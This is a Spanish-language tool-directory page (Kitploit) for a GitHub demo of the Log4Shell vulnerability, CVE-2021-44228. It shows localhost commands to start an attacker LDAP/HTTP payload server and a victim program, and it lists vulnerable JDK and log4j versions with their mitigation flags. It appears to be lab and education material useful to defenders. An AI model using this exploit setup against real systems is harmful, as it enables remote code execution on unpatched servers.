Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
sample-ldap-exploit — Una breve demostración de CVE-2021-44228 | Kitploit
Herramientas/GitHubGitHub/phoswald/sample-ldap-exploit
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebAprendizaje y EducaciónDesarrollo de PayloadsLabs y PrácticaArchived
GitHubphoswald/sample-ldap-exploit

sample-ldap-exploit

Una breve demostración de CVE-2021-44228

Ver Repositorio
521hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

sample-ldap-exploit

Una breve demo de CVE-2021-44228

Compilar

root@kitploit:~
$ mvn clean verify

Ejecutar Atacante

root@kitploit:~
$ java \
  -cp 'attacker/target/sample-attacker.jar:attacker/target/lib/*' \
  sample.attacker.Attacker localhost 1389 sample.payload.Payload 8080 payload/target/sample-payload.jar

URLs:

  • http://localhost:8080/
  • http://localhost:8080/sample/payload/Payload.class

Ejecutar Víctima

root@kitploit:~
$ java \
  -cp 'victim/target/sample-victim.jar:victim/target/lib/*' \
  sample.victim.Victim

Resultados

Descargar herramienta

JDK / JRE

VersiónEstado
Oracle JDK 8u5vulnerable
OpenJDK 8u312NO vulnerable (a menos que se use -Dcom.sun.jndi.ldap.object.trustURLCodebase=true)
IBM OpenJDK 8u312-b07 (OpenJ9)NO vulnerable (a menos que se use -Dcom.sun.jndi.ldap.object.trustURLCodebase=true)
OpenJDK 11.0.7+10NO vulnerable (a menos que se use -Dcom.sun.jndi.ldap.object.trustURLCodebase=true)
OpenJDK 11.0.13+8NO vulnerable (a menos que se use -Dcom.sun.jndi.ldap.object.trustURLCodebase=true)
OpenJDK 16+36NO vulnerable (a menos que se use -Dcom.sun.jndi.ldap.object.trustURLCodebase=true)
OpenJDK 17+35NO vulnerable (a menos que se use -Dcom.sun.jndi.ldap.object.trustURLCodebase=true)
OpenJDK 17.0.1+12NO vulnerable (a menos que se use -Dcom.sun.jndi.ldap.object.trustURLCodebase=true)

Si NO es vulnerable, una instancia de javax.naming.Reference es devuelta desde javax.naming.Context.lookup().

Si NO es vulnerable para cargar clases desde bases de código remotas, ¡probablemente aún existen otras vulnerabilidades de deserialización en Java!

log4j

VersiónEstado
2.9.1vulnerable
2.10.0vulnerable (a menos que se use -Dlog4j2.formatMsgNoLookups=true o la variable de entorno LOG4J_FORMAT_MSG_NO_LOOKUPS=true)
2.14.1vulnerable (a menos que se use -Dlog4j2.formatMsgNoLookups=true o la variable de entorno LOG4J_FORMAT_MSG_NO_LOOKUPS=true)
2.15.0NO vulnerable

Si NO es vulnerable, ${jndi:ldap:...} NO se resuelve.